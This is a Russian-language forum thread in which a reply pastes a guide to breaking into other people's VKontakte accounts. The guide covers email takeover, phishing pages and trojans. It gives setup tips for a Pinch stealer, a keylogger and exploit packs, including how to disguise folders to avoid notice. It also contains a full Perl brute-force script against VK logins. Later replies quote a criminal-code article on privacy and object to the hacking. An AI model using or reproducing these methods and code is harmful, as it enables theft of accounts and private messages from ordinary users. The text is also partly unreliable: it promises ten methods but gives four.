


ПОМОГИТЕ ПОНЯТЬ! Как нибуть попроще!
10 способов взлома анкеты vkontakte.ru
---------------------------------------------------------------
1) Через мыло, если мы его знаем то уже все проще, ведь имеется как минимум 15 методов взлома почты...НО есть и еще один минус, если пароль "корявый", он
разумеется надежный, но с его восстановлением проблемы, когда такой высылают на почту, то он принимает "левый" вид, и соответственно не работает. не в этом
суть, поэтому останавливаться не будем
2) Фейк, достаточно простой способ, кидаем ссылку жертве любым способом(ася, через лс и тд) скачать его можно по ссылке [ссылка появится после проверки модератором]
3) Троян. Эту категорию мы разделим на другие.
а) Скинуть "чистый" файл, либо ссылку на загрузку его, но тут еще надо чтобы пользователь его запустил. [ссылка появится после проверки модератором] - здесь лежит билдер пинча, а
здесь парсер [ссылка появится после проверки модератором] , если вы захотите чтобы отчеты шли на гейт - вот подходящий от Генома - [ссылка появится после проверки модератором]
б) кейлогер - менее полезный, но если жертва его "словит" и вы покопаетесь(причем оочень долго) с отчетом, то пароль получите 100%
в) Сплоит, тут ничего сложного нету, НО ЕСТЬ МИНУС! Паблик сплоиты пробивают в основном ие6 и то, примерно, 6/10(имхо)
Советую армитаж(айс пак тоже в теме). Прост в настройке, нужно только создать базу мускуль(делается в пару кликов), и отредактировать файлы(db.php config.php), после того как зальете на хост, выставляем нужные права, на папку load - 777. config.php - 777
Скачать 3 связки можно по ссылке [ссылка появится после проверки модератором] - здесь лежат мпак, айспак и армитаж
ЗЫ когда будете настраивать пинч, устанавите права на гейт 775, на папку в которую будут идти отчеты - 777, и не забывайте что не надо называть папку с отчетами OtchetyOTpincha, имхо палевно, лучше назовите 404 или еще как, ну что бы внимания не привлекало...Папку в которой будет лежать сплоит, тоже
переиминуйте на что-нить типа myphotos и тд... тк люди будут эту ссылку себе в браузер пихать, не нужно что бы там было написанно EXPLOIT...лишнее палево ни к чему...
Идем дальше...
Надеюсь, пинч уже настроен на гейт или почту, желательно что бы он еще и закриптованный был.
Заходим по ссылке на файл install.php нашего сплоита, а потом идем в админку, устанавливаем настройки, выбераем файл который будет грузится жертве, теперь он
будет лежать в папке load под именем file.
Кидаем ссылку жертве, и ждем с надеждой что ее пробьет и отчет с паролем нам придет.
4)Брутфорс, как всем известно - перебор паролей. Способ долгий, и не всегда сработает(в случае пароля D5&%-AefV)
Для этого брутфорсера нам потребуется активперл скачать мона тут [ссылка появится после проверки модератором] либо по ссылке
http://www.denwer.ru/packages/perl.html
Код:
#!/usr/bin/perl
use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;
open (pass, "<$dic");
Next:
@pass = pass();
for(0..$threads) {$trl[$_] = threads->create(&Brut, $_);}
for(@trl) { $_->join; }
sub Brut
{
while (@pass){
$pass = shift @pass;
$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
print $sock "HEAD [ссылка появится после проверки модератором] HTTP/1.0rn".
"Host: vkontakte.rurn".
"Accept: */*rn".
"Content-Type: application/x-www-form-urlencodedrn".
"User-Agent: Mozillorn".
"C*****: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5rn".
"Connection: closernrn";
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5n";
print "$id:$pass:$md5n";
close good;
exit;}
}
}
goto Next;
sub pass
{
my (@mas);
while (<pass>;){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}
Не забудьте сменить разширение на brut.pl
$dic = ‘passl.txt’; #паслист для брдутфорсера
$id = 1; #айд
Статья 137. Нарушение неприкосновенности частной жизни.
1. Незаконное собирание или распространение сведений о частной жизни лица, составляющих его личную или семейную тайну, без его согласия либо распространение этих сведений в публичном выступлении, публично демонстрирующемся произведении или средствах массовой информации, если эти деяния совершены из корыстной или иной личной заинтересованности и причинили вред правам и законным интересам граждан, - наказываются штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев, либо обязательными работами на срок от ста двадцати до ста восьмидесяти часов, либо исправительными работами на срок до одного года, либо арестом на срок до четырех месяцев.
2. Те же деяния, совершенные лицом с использованием своего служебного положения, - наказываются штрафом в размере от пятисот до восьмисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от пяти до восьми месяцев, либо лишением права занимать определенные должности или заниматься определенной деятельностью на срок от двух до пяти лет, либо арестом на срок от четырех до шести месяцев.
Так же вторжением в частную жизнь является нарушение тайны переписки, телефонных переговоров, почтовых, телеграфных или иных сообщений (статья 138), нарушение неприкосновенности жилища (статья 136).
По-моему очень понятно))
по-моему все понятней больше некуда
Как нибуть попроще!??? RTFM!(ПОГУГЛИ) Проще только в беседе, с разжевыванием)))
Мдяя....)) ) А по человечески как будет?))) ) Вы меня извините, но зачем вообще чужую почту ломать? Ладно, если спецслужбы там, вот именно от взлома этой почты зависит безопасность государства, или надо поймать педофила.. . Но для обычных то юзеров? Всё равно как чужие письма читать, или чужое белье рассматривать..
очень хочется вас оскорбить